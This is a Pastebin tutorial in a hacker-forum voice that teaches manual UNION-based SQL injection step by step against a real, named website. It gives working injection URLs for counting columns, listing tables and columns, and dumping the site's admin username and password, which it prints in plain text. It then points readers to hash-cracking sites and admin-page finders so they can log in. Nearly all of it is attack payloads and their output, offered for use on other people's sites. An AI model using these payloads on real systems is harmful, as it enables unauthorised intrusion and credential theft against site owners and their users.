API tools faq
paste
Advertisement
zurael_sTz

Sql injection site Manual (zurael sTz)

zurael_sTz
Apr 23rd, 2016
1,541
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 15.08 KB | None | 0 0
raw download clone embed print report
  1. Injection site manually
  2. הזרקה לאתר באופן ידני
  3. Hacker zurael sTz
  4. https://twitter.com/zurael_stz
  5.  
  6. Common Types of SQL injection are:
  7. Code:
  8. UNION Based SQL injection
  9. String Based SQL injection
  10. Error Based SQL injection
  11. Double Query SQL injection
  12. Blind SQL injection
  13. MsSQL injection
  14. What we are going to learn today is what we call UNION Based SQL injection
  15. Alright before we start we need to know how a website works while it stores Login information/pages/pictures/etc. in its database
  16. Lets just say that our website will look like this :
  17. "http://www.site.com/index.php?id=5"
  18. Notice at the end of the URL, "id=5"
  19. This is what the query will look like
  20. PHP Code:
  21. SELECT * FROM index
  22. WHERE id = 5
  23. Alright, now you know a bit of how the website works, let's get hacking Hehe
  24. Step1: Finding the vulnerability in a website
  25. It'll be like a small puzzle you have to solve. See, you can't just hack a website like http://www.site.com -.-
  26. To hack a website, you need to scan it yourself by clicking links and find out if there's something like "index.php?id=XXX" where "XXX" is a random integer (number) or string (word).
  27. Alright now to find sites vulnerable to SQLi is using Google Dorks.
  28. If you don't know how to use dorks, visit Part 1 of this project to learn all about them
  29. Once you've found a site vulnerable to SQLi, it's time to execute queries.
  30. For this tutorial, we'll be using "http://www.leadacidbatteryinfo.org" as an example.
  31.  
  32. Try browsing the website and see if you can find links like "index.php?id=xxx"
  33. It can be anything like "details.php?id=xxx" or "gallery.php?id="
  34. Just find an address with a number at the end of the URL
  35. Here's what I found "http://www.leadacidbatteryinfo.org/newsdetail.php?id=51"
  36.  
  37. Now to test for vulnerabilities is by ADDING a quote " ' " at the end of the url i.e after the integer or string
  38. So it'll look like this,
  39. Code:
  40. http://www.leadacidbatteryinfo.org/newsdetail.php?id=51'
  41.  
  42. Now you'll notice an error saying
  43. Code:
  44. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
  45. Spoiler (Click to View)
  46. This shows that the website is vulnerable to SQL injection.
  47. How is this possible?
  48. Look at the query when we added a quote " ' "
  49. PHP Code:
  50. SELECT * FROM article
  51. WHERE id = 5 '
  52. Notice that, their database never stored "id = 5 ' "
  53. This is why they return an error result
  54. Now that we know the website is vulnerable to SQL injection, let's advance to the next process
  55. Step2: Finding the number of columns a website has
  56.  
  57. This is the part where most people had commonly misunderstood.
  58. To get to the point, what we're about to do is find how many columns the website has using NoError/Error statements.
  59. Alright lets get started.
  60. The query we'll be using is "order by X--" where "X" is a random integer (number)
  61. Start by entering "order by 25--"
  62. Enter it at the end of the URL, so it'll look like this
  63. Code:
  64. http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 25--
  65. Error, there are no 25 columns, so it'll be less than 25
  66.  
  67. Now lets try "order by 20--"
  68. Code:
  69. http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 20--
  70. Still Error, so there are less than 20 columns
  71.  
  72. How about we go down a bit to "order by 5--"
  73. Code:
  74. http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 5--
  75. aha! No errors. So let's see if there are more than 5 columns
  76.  
  77. Now lets go up to "order by 11--"
  78. Code:
  79. http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 11--
  80. Hmm, no errors I see. So it's obvious that there could be more than 11 columns
  81.  
  82. See if we can increase to "order by 12--"
  83. Code:
  84. http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 12--
  85. Error! So this means the last number that returned no error is 11
  86. Therefore, the website has 11 columns
  87.  
  88. Tips:
  89. An error while scanning for number of columns will look like this
  90. Spoiler (Click to View)
  91. While No errors will show the page as normal Smile
  92. Step3: Now that we found the number of Columns, time to Execute the UNION SELECT statement
  93. First off, we need to know what does "UNION SELECT" means
  94. Lets say we have 2 tables, "users" and "admin"
  95. Basically, UNION SELECT is a statement where all these information will be collected as one.
  96. Look at this query
  97. PHP Code:
  98. SELECT * FROM users
  99. UNION SELECT * FROM admin
  100. If we perform the UNION SELECT statement, we can get both users and admin information from their database
  101. The point is that, UNION SELECT returns our results with the information we need
  102. If you want to find vulnerable columns, use UNION SELECT
  103. If you want to find version of database, UNION SELECT
  104. If you want admin information! use UNION SELECT Hehe
  105. Alright, now that we know something about the Union function, lets continue.
  106.  
  107. Take our website that has 11 columns and add a "UNION SELECT" statement.
  108. Here's how our query will look like
  109. Code:
  110. http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11--
  111. This is what you would normally do if you use UNION function while SQL injecting a website
  112.  
  113. Focus on something like this, "index.php?id=-X UNION SELECT N--"
  114. Where "X" is a random integer/string and "N" is the number of columns followed by two hyphens " -- " and another hyphen " - " beside "X"
  115. Step4: Random numbers appear on screen, the next step
  116. Alright I'm pretty sure you'll find a bunch of numbers showing up on the screen.
  117. These are known as "vulnerable columns" which states that those vulnerable columns have stored data inside them we need to extract.
  118. Here's how it'll look like:
  119. Spoiler (Click to View)
  120. You need to inject the number at the very top (always at the very top)
  121. So, in this case we have number "8"
  122. Now you might be asking, what can I do with a vulnerable column?
  123. Well here's what you can get-- INFORMATION!
  124. You need a lot of information to study from the website, here are a couple of examples.
  125.  
  126. Replace the vulnerable column i.e number 8 with a statement
  127. Statements:
  128. Code:
  129. @@version, version()
  130. database(),
  131. user(),
  132. @@hostname
  133. @@datadir
  134. Their functions
  135. @@version/version() = find the version of the database
  136. database() = find the current database
  137. user() = find the user information
  138. @@hostname = Current hosting info
  139. @@datadir = directory of the data of the website
  140.  
  141. To find the version of the database in the website, replace the vulnerable column i.e number 8 with "@@version" or "version()
  142. It'll look like this
  143. Code:
  144. http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,@@version,9,10,11--
  145. Results:
  146. Code:
  147. 5.1.52-log
  148. So the database version is 5, which is good because it'll be easier to SQL inject the website.
  149. Note:
  150. Database version less than 5 "<5" = you need to guess tables (a bit hard work)
  151. Database version greater than 5 ">5" = easy to inject with another function i.e group_concat
  152.  
  153. If you ever want to SQLi a website with version <5, then you can guess the tables with the following below
  154. Code:
  155. user
  156. username
  157. usernames
  158. admin
  159. admins
  160. users
  161. manager
  162. account
  163. accounts
  164. member
  165. login
  166. logins
  167. members
  168. tbl_user
  169. tbl_users
  170. tbl_admin
  171. tbl_admins
  172. tbl_member
  173. tbl_members
  174. tbladmins
  175. memberlist
  176. tbluser
  177. tblusers
  178. tblmanager
  179. tblmanagers
  180. tblclients
  181. tblservers
  182. adminuser
  183. usertbl
  184. userstbl
  185. admintbl
  186. adminstbl
  187. id
  188. tuser
  189. tusers
  190. uid
  191. userid
  192. user_id
  193. auid
  194. adminpass
  195. LoginID
  196. FirstName
  197. LastName
  198. cms_user
  199. cms_member
  200. cms_users
  201. cms_members
  202. cms_admin
  203. cms_admins
  204. user_admin
  205. user_info
  206. user_list
  207. user_login
  208. user_logins
  209. user_names
  210. userrights
  211. userinfo
  212. userlist
  213. webadmin
  214. webadmins
  215. Webmaster
  216. Webuser
  217. product
  218. products
  219. tblproducts
  220. tblproduct
  221. tbl_tbadmin
  222. Adminlogin
  223. We'll be knowing how to get the tables in the next step.
  224. But for now, let's see what we can get with other statements
  225. Lets try all statements at once shall we
  226. The URL will look like this,
  227. Code:
  228. http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(database(),version(),@@datadir,@@hostname,user()),9,1​0,11--
  229. Results:
  230. Code:
  231. 32908_leadacidbatteryinfoorg5.1.52-log/mnt/cluster/data/mysql1.myregisteredsite.com32908_user116602@lnh-www1h.bluehalo.myregisteredsite.com
  232. 3
  233. We have almost every information we have about the website
  234. Look close here, we used a command "group_concat"
  235. Here's its function:
  236. Group_concat = Gets every information at once i.e grouping them with the help of statements. Ex. group_concat(database())
  237. Note:Group_concat won't work with versions less than 5
  238. Step5:Getting the table names
  239. What are tables?
  240. Tables contain columns and columns contain the data
  241. It's like a stack (table) of books (columns) and data inside the books (data inside the columns)
  242. Alright, first lets look up some functions we're gonna use to extract table names (Important)
  243. Code:
  244. group_concat = grouping up data to a specific statement
  245. table_name = tables names to be shown on screen
  246. from = location of a specified statement
  247. information_schema.tables = information in the database with table names in it
  248. table_schema = tables in a database
  249. database() = current database in the website
  250. 0x0a = a Hex code that creates a new line for organizing tables in an order
  251. Now lets combine those functions and make up a query that will give us the table names
  252. So, here's what our link will look like:
  253. Code:
  254. http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(table_name,0x0a),9,10,11 from information_schema.tables where table_schema=database()--
  255. In here, we replaced our vulnerable column with "group_concat(table_name,0x0a)"
  256. and then we added a
  257. "from information_schema.tables where table_schema=database()--"
  258. after the last column (excluding the two hyphens after 11)
  259. Results on table names:
  260. Code:
  261. pdigclicks ,pdigengine ,pdigexcludes ,pdigincludes ,pdigkeywords ,pdiglogs ,pdigsite_page ,pdigsites ,pdigspider ,pdigtempspider ,tbladmin ,tblbanner ,tblbanner_page ,tblfaq ,tblncategory ,tblnews
  262. Spoiler (Click to View)
  263. Alright now that we've found the tables, what you're gonna have to do is
  264. that, you have to find tables where user/admin information are stored
  265. In this case, "tbladmin" seems to be having an admin information stored in it.
  266. It's all about predicting and expecting what's behind every table you see
  267. Okay, before proceeding to the next step, make sure you remember the statements we used in order to get the tables.
  268. Replace and Add the following
  269. Vulnerable Column = replace with "group_concat(table_name,0x0a)"
  270. After the last column = Add "from information_schema.tables where table_schema=database()--"
  271. Also, don't forget about UNION SELECT before the column numbers and the hyphen ( - ) before "X" at index.php?id=X where "X" is a random integer/string
  272. Step6:Getting Columns from Tables
  273. Alright obviously, our next task is to get the column names from a specific table which in our case was "tbladmin'
  274. To do this, we're gonna have to alter some queries a bit
  275. Now look closely at this syntax:
  276. Code:
  277. http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(column_name,0x0a),9,10,11 from information_schema.columns where table_name=0x74626c61646d696e--
  278. Here's what we replaced:
  279. table_name = replaced by "column_name"
  280. information_schema.tables = replaced by "information_schema.columns"
  281. table_schema = replaced by "table_name"
  282. database() = replaced by "0x74626c61646d696e--"
  283. Now that you know the replacements in our syntax, you still might be wondering what's up with the last part where entered "0x74626c61646d696e--"
  284. First of all, these are known as Hex
  285. To make a Hex readable, we put "0x" at the beginning
  286. I'll explain this briefly. So our table name was "tbladmin"
  287. To enter that table using the syntax above, we have to convert that table name to Hex
  288. In order to do that, visit this website:
  289. http://www.swingnote.com/tools/texttohex.php
  290. It's a text to hex converter
  291. Enter "tbladmin" in the text box and hit convert
  292. You'll notice the results will be "74626c61646d696e" (that's the hex)
  293. Now to make it readable to the website, add "0x" at the beginning
  294. So it will be:
  295. Code:
  296. 0x74626c61646d696e
  297.  
  298. Now you know how Hex works, lets look up some functions we replaced and know their uses (Important)
  299. Code:
  300. group_concat(column_name,0x0a) = grouping the column names we're going to extract
  301. information_schema.columns = column names stored in database
  302. table_name = extracting column from a specific table
  303. 0xHEX_Code_Table = Specific table name converted to hex
  304. Results after extracting column names from tables:
  305. Code:
  306. adminid ,username ,password ,dom
  307. Spoiler (Click to View)
  308. Now that we've got the columns from that table, it's time to extract the information.
  309. What we're gonna need here is obviously only the "username" and "password"
  310. Step7:Getting Data from Columns
  311. Alright, lets extract the information
  312. Look closely at the syntax:
  313. Code:
  314. http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(username,0x3a,password,0x0a),9,10,11 from tbladmin--
  315. Keep this formula-like syntax in your mind whenever you want to extract data from columns
  316. Code:
  317. http://www.site.com/index.php?id=-X UNION SELECT N,group_concat("columnName,0x3a,columnName,0x0a) from "tablename"--
  318. Where "X" is a random integer/string followed by a hyphen ( - ) while "N" is the number/position of the column and "columnName" is the column you want to extract data while "tablename" is where you extract data from a specific table then two hyphens in the end ( -- )
  319. CONTINUED BELOW
  320. Now for revising,
  321. column names = username, password
  322. separator = 0x3a (a hex for a colon " : ")
  323. table name = tbladmin
  324. Once you execute that syntax, you get the username and password separated by a colon
  325. Results after executing the syntax:
  326. Code:
  327. ishir:ishir123
  328. Username: ishir
  329. Password: ishir123
  330. Special cases: Hashed Usernames and Passwords
  331. Most websites will have their passwords hashed as MD5
  332. In this case you'll need to crack them.
  333. Using some websites will help you
  334. Here's a list of Hash cracking websites:
  335. Code:
  336. www.md5decrypter.co.uk/
  337. www.md5this.com/
  338. www.md5crack.com/
  339. http://hashchecker.de/find.html
  340. An MD5 Hash will look like this:
  341. Code:
  342. 21232f297a57a5a743894a0e4a801fc3 -- 32 characters
  343. A SHA-1 Hash will look like this:
  344. Code:
  345. d033e22ae348aeb5660fc2140aec35850c4da997 -- 40 characters
  346. I'll make up a detailed tutorial on Hash cracking soon.
  347. But for now, refer to this for a little knowledge about hashes
  348. http://hackforums.net/showthread.php?tid=1393830
  349. Credits to Haxor and Insidepro
  350.  
  351. Last Step: Finding the admin page and logging in for the goodsDevlish
  352. Alright, now that we have our admin login info
  353. Username: ishir
  354. Password: ishir123
  355. It's time to find the login pages
  356. To do this, you can use Admin Page Finders
  357. Here's some you can use
  358. >>Scorpion Admin Page Finder<<
  359. http://sc0rpion.ir/af/
  360. >>Outlaw Admin Page Finder<<
  361. http://www.tools.th3-0utl4ws.com/admin-finder/
  362. >>Napsterakos Admin Page Finder<<
  363. http://hackforums.net/showthread.php?tid...ight=HaviJ
  364. >>HaviJ Injector/Cracker and Admin page finder<<
  365. http://hackforums.net/showthread.php?tid...age+finder
  366. Alright after scanning the website for admin pages, you should see something like this:
  367. Code:
  368. http://www.leadacidbatteryinfo.org/admin/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!